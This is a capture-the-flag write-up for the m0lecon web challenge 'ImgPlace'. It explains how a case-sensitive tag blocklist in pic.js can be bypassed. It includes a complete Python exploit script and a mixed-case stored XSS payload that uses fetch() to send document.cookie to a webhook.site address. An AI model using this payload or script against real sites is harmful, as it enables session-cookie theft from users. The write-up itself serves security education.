Skip to content
webM0lecon beginner2025117 words · 1 min read

Are you a photographer but have no reputation? Join ImgPlace! Share your photos... and become popular!

#web
232 pts 13 solves

ImgPlace

by akiidjk · 17 Jul 2026

Introduction

We have a very simple application where we are allowed to register and log in and then we can upload images via url and associated description

Source

The source is only parsable by devtools from the browser, and we can see that in the pic.js file we have a function that sanitizes the image description

# filename: pic.js

"use strict";

(async () => {
    const picPhoto = document.getElementById("picPhoto");
    const picDesc = document.getElementById("picDesc");

    const r = await fetch("/api/pic/" + window.picId);

    if (r.ok) {
        const data = await r.json();
        picPhoto.src = data.src;

        // We need to block dangerous things!
        const blocklist = [
            "<comment",
            "<embed",
            "<link",
            "<listing",
            "<meta",
            "<noscript",
            "<object",
            "<plaintext",
            "<script",
            "<xmp",
            "<style",
            "<applet",
            "<iframe",
            "<img",
            "onload",
            "onblur",
            "onclick",
            "onerror",
            "href",
            "javascript",
            "window",
            "src",
        ];
        let description = String(data.description);
        blocklist.forEach((word) => {
            description = description.replace(word, "");
        });

        picDesc.innerHTML = description;
    } else {
        if (r.status == 401) {
            window.location.href = "/profile";
        } else {
            alert("Unable to load photo!");
        }
    }
})();

We can see this trivially from the code that takes ById elements are taken and the word is deleted.

Solution

There are really several solutions I used the simplest one which is to take advantage of the fact that the replace is case sensitive and no lowercase is done in the code to my description

# filename: exploit.py

#!/usr/bin/python3
import random
import string

import requests
from bs4 import BeautifulSoup

BASE_URL = "https://imgplace.challs.m0lecon.it"
URL_HOOK = "https://webhook.site/6a1df142-d272-4e11-8937-dbd81a33e9d2"

def string_generator(length):
    return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))

s = requests.Session()

def register(username, password):
    r = s.post(f"{BASE_URL}/register", data={"username": username, "password": password,"confirmPassword":password})

    if r.status_code != 200:
        print("[+] Error register")
        print(r.text)
        exit(1)
    else:
        print("[+] Register success")

def login(username, password):
    r = s.post(f"{BASE_URL}", data={"username": username, "password": password})
    if r.status_code != 200:
        print("[+] Error login")
        print(r.text)
        exit(1)
    else:
        print("[+] Login success")

def new(payload):
    r = s.post(f"{BASE_URL}/new", data={"url": URL_HOOK, "description": payload})
    if r.status_code != 200:
        print("[+] Error new image")
        print(r.text)
        exit(1)
    else:
        print("[+] New Image Success")


def main():
    username,password = string_generator(10),string_generator(10)
    print(f"Username: {username} Password : {password}")
    register(username,password)
    login(username,password)
    payload = "<ImG SrC=x OnError=fetch(`"+URL_HOOK+"?q=${document.cookie}`)>"
    new(payload=payload)
    print("[+] Done")
    print("[+] Now login to the website go to the image complete the captcha and you will get the flag on the webhook")


if __name__ == "__main__":
	main()

# goodluck by @akiidjk

flag: ptm{n3v3r_tRvST_t3g_bL0ckL1sts}

ByteTheCookies

Hello, we are ByteTheCookies (BTC), a passionate CTF team formed by students from the University of Salerno after participating in the CyberChallenge 2024.

CTFtime #309819

We play

blockchaincancryptohardwaremiscmobileppcpwnreverseweb
© 2026 ByteTheCookies. All wrongs reversed.We don't eat cookies. We byte them.